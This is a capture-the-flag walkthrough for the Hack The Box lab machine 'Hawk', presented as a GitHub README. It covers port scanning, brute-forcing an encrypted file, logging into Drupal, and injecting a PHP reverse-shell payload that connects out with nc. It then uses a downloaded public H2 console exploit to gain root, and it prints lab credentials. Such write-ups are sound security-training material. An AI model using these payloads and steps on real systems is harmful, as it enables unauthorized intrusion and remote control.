Skip to content

Latest commit

 

History

History
176 lines (95 loc) · 3.28 KB

README.md

File metadata and controls

176 lines (95 loc) · 3.28 KB
Raw

Hawk

nmap -p- --min-rate 10000  10.10.10.102 -Pn

Alt text

After knowing open ports(21,22,80,5435,8082,9092), let's do greater nmap scan.

nmap -A -sC -sV -p21,22,80,5435,8082,9092 10.10.10.102 -Pn

Alt text

Let's start from FTP(port 21) that we find which we can login via 'anonymous' user.

Alt text

Let's try to analyze the file which we find from FTP.

file .drupal.txt.enc

Alt text

Let's first base64 decoding.

base64 -d .drupal.txt.enc > drupal_ssl
file drupal_ssl

Alt text

I just make brute-force to decrypt this file. For this I find such tool on Github.

Note: This tool is also available on Kali (as built-in).

Here,we do brute-force attack to decrypt this file by using tool called bruteforce-salted-openssl

bruteforce-salted-openssl -t 6 -f /usr/share/wordlists/rockyou.txt drupal_ssl -c aes-256-cbc -d sha256

Alt text

We find password that is 'friends',

As we know password, we can decrypt this via openssl command.

openssl enc -d -aes256 -md sha256 -salt -in drupal_ssl -out drupal_decrypted -k friends

Alt text

Now, we know password of 'admin' user for service on port 80.

admin: PencilKeyboardScanner123

We can login via above credentials.

Alt text

First, we need to add 'PHP Code' filter from 'Modules' section of application.

Alt text

Then, we just click 'Add Content' -> 'Basic Page', we can enter malicious PHP code to get RCE.

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 1337 >/tmp/f'); ?>

Alt text

I got reverse shell.

Alt text

Let's make interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash

Alt text

user.txt

Alt text

While enumerating machine, I find file '/var/www/html/sites/default/settings.php' that contains sensitive information.

Alt text

That's password of 'daniel' user.

Alt text

daniel: drupal4hawk

But, there's something that I have Python shell while logging via 'daniel' user.

I just see why it is happens from '/etc/passwd' file.

Alt text

To get normal interactive shell, just did below.

import os
os.system("/bin/bash")

Alt text

If we pay attention to our nmap scan, we saw that there is database running for port (8082)

That is 'H2 database http console'

Let's search publicly known exploit.

Alt text

Let's upload this malicious script into target machine by opening http server.

python3 -m http.server --bind 10.10.14.9 8080

Alt text

Let's download into target machine.

wget http://10.10.14.9:8080/45506.py

Alt text

Let's change privileges of this file and execute.

chmod 777 45506.py
python3 45506.py -H 127.0.0.1:8082

root.txt

Alt text